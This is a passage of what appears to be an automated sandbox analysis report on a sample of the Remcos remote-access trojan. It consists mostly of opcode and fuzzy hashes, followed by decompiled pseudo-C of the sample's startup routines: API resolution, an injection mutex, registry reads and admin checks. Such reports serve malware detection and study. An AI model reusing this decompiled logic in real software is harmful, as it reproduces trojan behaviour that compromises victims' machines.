                                          • Instruction Fuzzy Hash: 51E09A30D152698FDBA4DFAAC884B8CB7B1FF48204F008496D11AF6224DB306D85CF20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: m$|Y
                                          • API String ID: 0-1181860180
                                          • Opcode ID: 4f280ee6d11e1c05e21a12e14372abd058a8644f021a94fe6bdbdf6e1825fb6e
                                          • Instruction ID: a31d95eed68611266c22782a47cc907d6f72ba28e05f8dedc74783e42eb376a8
                                          • Opcode Fuzzy Hash: 4f280ee6d11e1c05e21a12e14372abd058a8644f021a94fe6bdbdf6e1825fb6e
                                          • Instruction Fuzzy Hash: 2691D074A15219DFCB44CFAAC58499EFBF1FF88210F24955AE419BB224D334AE42CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: m$|Y
                                          • API String ID: 0-1181860180
                                          • Opcode ID: 6937723b25065e585f8215fa85ef62322020d023b6ff8b0eae3b812736a6c736
                                          • Instruction ID: eb6fbc758901ce6ecb60ccecfe79e88b21e1fd83e963efab560cb631501c726f
                                          • Opcode Fuzzy Hash: 6937723b25065e585f8215fa85ef62322020d023b6ff8b0eae3b812736a6c736
                                          • Instruction Fuzzy Hash: B881D174A15219CFCB44CFAAC58499EFBF1FF88210B24959AE415BB324D334AE42CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: O(zA
                                          • API String ID: 0-6709333
                                          • Opcode ID: ff0d9ae9d1180efccdac9b33358d143b8692a6e7451f8f6fcfda3a8bc079c64f
                                          • Instruction ID: d33c11a0e7ec18a066c844c8b44a45996a1261964b4a9652a9e1fe35c790307f
                                          • Opcode Fuzzy Hash: ff0d9ae9d1180efccdac9b33358d143b8692a6e7451f8f6fcfda3a8bc079c64f
                                          • Instruction Fuzzy Hash: 7F6125B0D052199FCB48CFA6D5816EEFBB2FF88300F14846AE411E7214D7349A52CFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d7f83643ff551492f604d5ecd00376f835b2b0a96d57fab5395538520b4ff98
                                          • Instruction ID: 351f2d253ef5b1e7a8a3c13d46ae482ab7e5f41ba17f640722c356c77f021682
                                          • Opcode Fuzzy Hash: 2d7f83643ff551492f604d5ecd00376f835b2b0a96d57fab5395538520b4ff98
                                          • Instruction Fuzzy Hash: 64D1AC71701604AFEB1AEB76C4507AAB7FBAF89304F2484ADD146DB3A0CB35E901CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8d5206dc0b959cfa46d3c62157deb4b782b14bc1610c1590a530d592cb93f07
                                          • Instruction ID: 0f5927e776f30606a84bab6ff2036f1117f77da964825ce5104b1cc570897757
                                          • Opcode Fuzzy Hash: f8d5206dc0b959cfa46d3c62157deb4b782b14bc1610c1590a530d592cb93f07
                                          • Instruction Fuzzy Hash: 5F12A4F1412746AAD331DF65E8981897BA1F74532CB90420AD2A13BAD0D7FC194BCFE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9367b17ef32affb9d6737261a9cbf8ba95e9020036503f81ad0bf180615d08c5
                                          • Instruction ID: f662a2d30c09f8107bb0db83de4aeedd5bd10a1d1583304327d3a23ea73c783c
                                          • Opcode Fuzzy Hash: 9367b17ef32affb9d6737261a9cbf8ba95e9020036503f81ad0bf180615d08c5
                                          • Instruction Fuzzy Hash: 85A18E32E006198FDF05DFB5C8446EDF7B6FF85304B1586AAE905BB221EB75A905CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c1c220245a9d3ce76fa99c76d8f1374674f4c1906a10331c0431c3768af5ac8
                                          • Instruction ID: 9b2b74e7d37f56dfd7559553ea2653926e44c6f95abb5229bbccce4441683367
                                          • Opcode Fuzzy Hash: 1c1c220245a9d3ce76fa99c76d8f1374674f4c1906a10331c0431c3768af5ac8
                                          • Instruction Fuzzy Hash: 3AD10730D2064A9ADB10FBA4D954ADDB7B1FFE5300F509B9AE00937264EF706AC4CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c8737c5dfc311b788cf20f8447f87243c63a17993d04ded48bf2f21ec1eab20
                                          • Instruction ID: a988ad8d5616aefda59837f7bbf22ba60eda9c3412af3d83dc3ef01a015be1d9
                                          • Opcode Fuzzy Hash: 7c8737c5dfc311b788cf20f8447f87243c63a17993d04ded48bf2f21ec1eab20
                                          • Instruction Fuzzy Hash: 51B18B74E14219CFDB54CFA6C980A9EFBB2FF88304F2085AAE909A7355D7309A41CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 213501f761a3bf731189f8c1447c01dfe802b5a45fce514d74fc38e75e363e3b
                                          • Instruction ID: 70ccde68e7ce81a40870ac3483a89caa157d428559dcfa0cb0639761afc35100
                                          • Opcode Fuzzy Hash: 213501f761a3bf731189f8c1447c01dfe802b5a45fce514d74fc38e75e363e3b
                                          • Instruction Fuzzy Hash: F7C127B1812746AAD731DF65E8881897B61FB8532CF50420AD2613B6D0D7FC188BCFE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5c8c18096248fc8cbcae12401261b8dc76832ac25e3250933c1954ec085bdef
                                          • Instruction ID: 17141369050cf32bd5fcdad4592e3659d065c899d312d287ec86bff501e10127
                                          • Opcode Fuzzy Hash: f5c8c18096248fc8cbcae12401261b8dc76832ac25e3250933c1954ec085bdef
                                          • Instruction Fuzzy Hash: 04813B74D1520ACFCB48CFE6D9415AEFBB2EF8A340F14986AC51AA7314D7349942CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ebbde980ee70f57a6a77694d009b6e621fe40e6be6978337b6519cb00791963a
                                          • Instruction ID: e2f3f2eb2c172be07a537be48f9c447b7ce39bafc71b57692e0dd2884435f9ff
                                          • Opcode Fuzzy Hash: ebbde980ee70f57a6a77694d009b6e621fe40e6be6978337b6519cb00791963a
                                          • Instruction Fuzzy Hash: 5D610674E012098FDB44CFAAC5C09EEBBF2EF88310F14946AE415F7214D730AA51CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbe7f1c537e677185af2fa8be62743725273df112408bb331859872f7f529d59
                                          • Instruction ID: e5dc7e68ba68f9fd5166b293fec4ed17cf73781731b7c23f4925a12a5a0dbd8a
                                          • Opcode Fuzzy Hash: bbe7f1c537e677185af2fa8be62743725273df112408bb331859872f7f529d59
                                          • Instruction Fuzzy Hash: 72615A70E052548FCB15CFA9C9906AEFBB2BF89304F24C4AAC848A7316D7309A45CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a5eb712a57979c799a374506b75dcce6f665d6768f80e611a11e8a80cdb3f29b
                                          • Instruction ID: cbb2e37b7845d7e789dd65c175afbad95aae2ee711ca9e0edc9b2310a6ed2dfa
                                          • Opcode Fuzzy Hash: a5eb712a57979c799a374506b75dcce6f665d6768f80e611a11e8a80cdb3f29b
                                          • Instruction Fuzzy Hash: 5E61E774E152198FDB44CFAAC5809EEFBF2AF88310F14942AE415F7224D730AA41CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e9686ee4253b0aed023d8bbf7df0b21592f2d638d338b667631a363061e6cdc
                                          • Instruction ID: 6df17d46c1309c44741f23035f6aa78888d59c14b32a0e8ceef13c50743f9b03
                                          • Opcode Fuzzy Hash: 2e9686ee4253b0aed023d8bbf7df0b21592f2d638d338b667631a363061e6cdc
                                          • Instruction Fuzzy Hash: 91611A74E04219CFCB14CF99D980AAEFBB2FB89304F24D5A9D808A7315D7309A45CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b8fd82d6fcd9c3cccdf43cbb032f2f872bdf1881bc5d1078b0da3b83b894942
                                          • Instruction ID: 314fb293f185f783a81f3d382501f2cb5c5938dd2f01431a783d214c9b674186
                                          • Opcode Fuzzy Hash: 2b8fd82d6fcd9c3cccdf43cbb032f2f872bdf1881bc5d1078b0da3b83b894942
                                          • Instruction Fuzzy Hash: 815106B0E042199FDB44CFAAC4806AEFBF2FB88300F14C46AD919F7254D7349A518F99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51daed71306c6ef519b959105c52b92f02c1c449ddfcb33b96c3cbb55114651b
                                          • Instruction ID: a80884fdbb8c48ae20383867b23e345ff0c714936891b4f244f5d833518a385e
                                          • Opcode Fuzzy Hash: 51daed71306c6ef519b959105c52b92f02c1c449ddfcb33b96c3cbb55114651b
                                          • Instruction Fuzzy Hash: 86516F70E0560A9FDB44CFAAD5815AEFBB2FF88300F24C46AD505E7218D3309A52CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61469b5304f93d8293bf071d1171bd143df083c75cf6dce22a2eed7c5d2741ad
                                          • Instruction ID: b147c0211614129929fff927de861796a4f4a2b014ebc5ebc53f8f8eb6deeb92
                                          • Opcode Fuzzy Hash: 61469b5304f93d8293bf071d1171bd143df083c75cf6dce22a2eed7c5d2741ad
                                          • Instruction Fuzzy Hash: D541B270E0561A9FDB84CFAAC4806EEFBB2FF88300F24C569D915B7254D7349A518F98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3acea2e9e4adb377c95868dbe1b3adba92fb5939e96b40a18928adaf0670bb1
                                          • Instruction ID: 5ac0b8cecd01f4c7614a571dd115ba619c8fc9bd57cc972bd55532a264d1404e
                                          • Opcode Fuzzy Hash: b3acea2e9e4adb377c95868dbe1b3adba92fb5939e96b40a18928adaf0670bb1
                                          • Instruction Fuzzy Hash: B8315E71D153559FDB0ACF6AC94529ABBF2BF8A300F18C0BBC408EB255EB340946CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55d89a9b6490af7c4b93789b50be81a495b79b253517ab6a7b3e42ec9efbf8f1
                                          • Instruction ID: e6bfddb1846654d57d660c81f42ef656a94fcf96dd4784f8e9f370ff1da52aa3
                                          • Opcode Fuzzy Hash: 55d89a9b6490af7c4b93789b50be81a495b79b253517ab6a7b3e42ec9efbf8f1
                                          • Instruction Fuzzy Hash: 9A312DB1E016189FEB58CF6BDC4069EFBF3AFC9200F04C1AAD508AB264DB3059468F55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d96bbe4015ffc4fed72d6eb0004ad9a294338afa423bfdf65dfc8884f1e20f8c
                                          • Instruction ID: 4232e6afc0c57f16bfa5f255e15daf601b67a2680d4d9ef5017019e0e1d202f3
                                          • Opcode Fuzzy Hash: d96bbe4015ffc4fed72d6eb0004ad9a294338afa423bfdf65dfc8884f1e20f8c
                                          • Instruction Fuzzy Hash: 6F21F971E056189FEB48CFAB984069EFAF7AFC9200F04C17AD908A6264EB3006558F55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa51100e9d324b6bda3703b939c63ba34eb551a00cd89737c336eee8e82d7779
                                          • Instruction ID: 56aead95d10b977f379d48b812a38adbf28e5a397d880229ecb42ab16ea45c5b
                                          • Opcode Fuzzy Hash: fa51100e9d324b6bda3703b939c63ba34eb551a00cd89737c336eee8e82d7779
                                          • Instruction Fuzzy Hash: E921F471E116199BDB08CFAAD9406DEFAF7AFC8210F14C03AD508A7218DB345A568F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 100%
                                          			E00407D38() {
                                          				struct HINSTANCE__* _t1;
                                          				_Unknown_base(*)()* _t2;
                                          				_Unknown_base(*)()* _t6;
                                          				_Unknown_base(*)()* _t14;
                                          				CHAR* _t20;
                                          
                                          				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                          				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                          				 *0x41592c = _t2;
                                          				if(_t2 == 0) {
                                          					 *0x41592c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                          				}
                                          				 *0x415928 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                          				if( *0x41592c == 0) {
                                          					 *0x415928 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                          				}
                                          				_t6 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                          				_t20 = "kernel32";
                                          				 *0x415934 = _t6;
                                          				 *0x415b94 = GetProcAddress(GetModuleHandleA(_t20), "IsWow64Process");
                                          				 *0x415b98 = GetProcAddress(GetModuleHandleA(_t20), "GetComputerNameExW");
                                          				 *0x415930 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                                          				_t14 = GetProcAddress(GetModuleHandleA(_t20), "SetProcessDEPPolicy");
                                          				 *0x415960 = _t14;
                                          				return _t14;
                                          			}








                                          0x00407d4b
                                          0x00407d54
                                          0x00407d5c
                                          0x00407d63
                                          0x00407d74
                                          0x00407d74
                                          0x00407d8f
                                          0x00407d94
                                          0x00407da5
                                          0x00407da5
                                          0x00407db7
                                          0x00407db9
                                          0x00407dc4
                                          0x00407dd4
                                          0x00407de8
                                          0x00407df8
                                          0x00407e00
                                          0x00407e04
                                          0x00407e0a

                                          APIs
                                          • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407D54
                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407D72
                                          • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407D86
                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DA3
                                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DB7
                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DCC
                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DDC
                                          • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DF0
                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407E00
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleModule$LibraryLoad
                                          • String ID: GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$kernel32$kernel32.dll
                                          • API String ID: 551388010-3266460993
                                          • Opcode ID: a95c33b2883edc0f1f24b44dfa6ebdd0fa9b065003bbad78de045f2cdf40495f
                                          • Instruction ID: 7df7edf4bea3ca915ca9c3ab11915317f4629f066757df969619983bfa8a711c
                                          • Opcode Fuzzy Hash: a95c33b2883edc0f1f24b44dfa6ebdd0fa9b065003bbad78de045f2cdf40495f
                                          • Instruction Fuzzy Hash: D8112EF0E51794FAC720ABB6AC49FDA2E9CAA8C7513118427F204D3570D6BC94C08E6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 19%
                                          			E00407452(void* __ecx, void* __edx, void* __eflags) {
                                          				char _v5;
                                          				char _v12;
                                          				void* _v16;
                                          				char _v32;
                                          				char _v48;
                                          				char _v64;
                                          				char _v80;
                                          				void* _t64;
                                          				char* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          				void* _t72;
                                          				CHAR* _t73;
                                          				void* _t80;
                                          				char _t81;
                                          				intOrPtr* _t82;
                                          				char* _t83;
                                          				void* _t84;
                                          				signed int _t85;
                                          				signed int _t87;
                                          				signed int _t89;
                                          				signed int _t91;
                                          				signed int _t93;
                                          				char* _t95;
                                          				char* _t96;
                                          				int _t97;
                                          				intOrPtr* _t98;
                                          				char _t101;
                                          				void* _t102;
                                          				intOrPtr* _t103;
                                          				CHAR* _t106;
                                          				char* _t109;
                                          				char* _t110;
                                          				char _t112;
                                          				char* _t115;
                                          				char* _t116;
                                          				char* _t117;
                                          				char* _t118;
                                          				intOrPtr* _t121;
                                          				char* _t124;
                                          				int _t125;
                                          				signed int _t126;
                                          				void* _t129;
                                          				intOrPtr* _t130;
                                          				void* _t140;
                                          				intOrPtr* _t141;
                                          				void* _t144;
                                          				char* _t147;
                                          				char _t148;
                                          				char _t149;
                                          				void* _t150;
                                          				void* _t151;
                                          				void* _t152;
                                          				void* _t156;
                                          				signed int _t160;
                                          				signed int _t162;
                                          				void* _t164;
                                          				void* _t165;
                                          				intOrPtr* _t166;
                                          				signed int _t168;
                                          				void* _t170;
                                          				intOrPtr* _t171;
                                          				void* _t174;
                                          				char* _t176;
                                          				char _t177;
                                          				unsigned int _t287;
                                          				signed int _t288;
                                          				void* _t324;
                                          				signed int _t329;
                                          				struct _SECURITY_ATTRIBUTES* _t338;
                                          				void* _t339;
                                          				void* _t341;
                                          				void* _t346;
                                          				void* _t347;
                                          				void* _t348;
                                          				void* _t351;
                                          				void* _t356;
                                          
                                          				_t356 = __eflags;
                                          				_t324 = __edx;
                                          				E00407C53( &_v48);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( *0x415114,  &_v5);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v48);
                                          				_t64 = E0040EFB5(_t356); // executed
                                          				E00408510(0x415940, _t64);
                                          				E00401B3C( &_v64);
                                          				_t68 =  &_v80;
                                          				L0040FC1A();
                                          				_t69 =  &_v64;
                                          				L0040FC20();
                                          				_t346 = _t341 - 0xfffffffffffffffc + 0x3c;
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t69, _t69, _t68, _t68, "Software\\", E00401289(0x415940, _t356, 0xe), 0x4108cc,  &_v64);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				_t338 = 0;
                                          				_v12 = 0;
                                          				_t70 = OpenMutexA(0x100000, 0, "Remcos_Mutex_Inj");
                                          				if(_t70 != 0) {
                                          					WaitForSingleObject(_t70, 0xea60);
                                          				}
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t72 = E00408E97(0x4157e8, 0x80000001,  &_v12, "Inj",  &_v12); // executed
                                          				_t347 = _t346 + 0x10;
                                          				_t358 = _t72;
                                          				if(_t72 != 0) {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					E00409132(0x80000001, _t72, "Inj");
                                          					_t347 = _t347 + 0xc;
                                          				}
                                          				_t73 = E00401289(0x415940, _t358, 0xe);
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t73);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				CreateMutexA(_t338, 1, _t73); // executed
                                          				if(GetLastError() != 0xb7) {
                                          					E00407D38();
                                          					E00401000(__eflags);
                                          					GetModuleFileNameA(_t338, "C:\\Users\\hardz\\Desktop\\MV OLYMPIC PROGRESS VSL PARTICULARS.exe", 0x104);
                                          					_t80 = E00408EF1( &_v80, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                                          					_t348 = _t347 + 0x10;
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t80);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					_t81 = E0040F0B5( &_v80);
                                          					__eflags = _t81;
                                          					if(_t81 == 0) {
                                          						_push(" (32 bit)");
                                          					} else {
                                          						_push(" (64 bit)");
                                          					}
                                          					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
                                          					_t82 =  *0x415930;
                                          					__eflags = _t82 - _t338;
                                          					if(_t82 != _t338) {
                                          						 *0x41511c =  *_t82();
                                          					}
                                          					__eflags = _v12 - _t338;
                                          					if(__eflags == 0) {
                                          						_t176 = E00401289(0x415940, __eflags, 0x2e);
                                          						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						__eflags =  *_t176;
                                          						if(__eflags != 0) {
                                          							__eflags =  *0x415930 - _t338; // 0x7632e630
                                          							if(__eflags != 0) {
                                          								__eflags =  *0x41511c - _t338; // 0x1
                                          								if(__eflags == 0) {
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t177 = E00408E4E(0x80000001, _t176, "origmsc");
                                          									_t348 = _t348 + 0xc;
                                          									__eflags = _t177;
                                          									if(__eflags == 0) {
                                          										E00402A78(0x4157e8, __eflags);
                                          									}
                                          								} else {
                                          									__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z("XP", _t338);
                                          									__eflags =  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB - _t176;
                                          									if(__eflags == 0) {
                                          										E00402B5B(__eflags);
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_t83 = E00401289(0x415940, __eflags, 0x27);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t83;
                                          					if(__eflags != 0) {
                                          						E004084B8();
                                          					}
                                          					_t84 = E00401289(0x415940, __eflags, 0xb);
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t84);
                                          					_t85 = E00401289(0x415940, __eflags, 4);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t85;
                                          					 *0x415808 = _t85 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t87 = E00401289(0x415940, __eflags, 5);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t87;
                                          					 *0x415911 = _t87 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t89 = E00401289(0x415940, __eflags, 6);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t89;
                                          					 *0x415910 = _t89 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t91 = E00401289(0x415940, __eflags, 7);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t91;
                                          					 *0x4157e0 = _t91 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t93 = E00401289(0x415940, __eflags, 8);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t93;
                                          					 *0x4157c8 = _t93 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t95 = E00401289(0x415940, __eflags, 3);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t95;
                                          					if(__eflags != 0) {
                                          						_t168 = E00401289(0x415940, __eflags, 0x30);
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						asm("repne scasb");
                                          						__eflags =  !(_t168 | 0xffffffff) - 1;
                                          						if(__eflags != 0) {
                                          							_t170 = E00401289(0x415940, __eflags, 0x30);
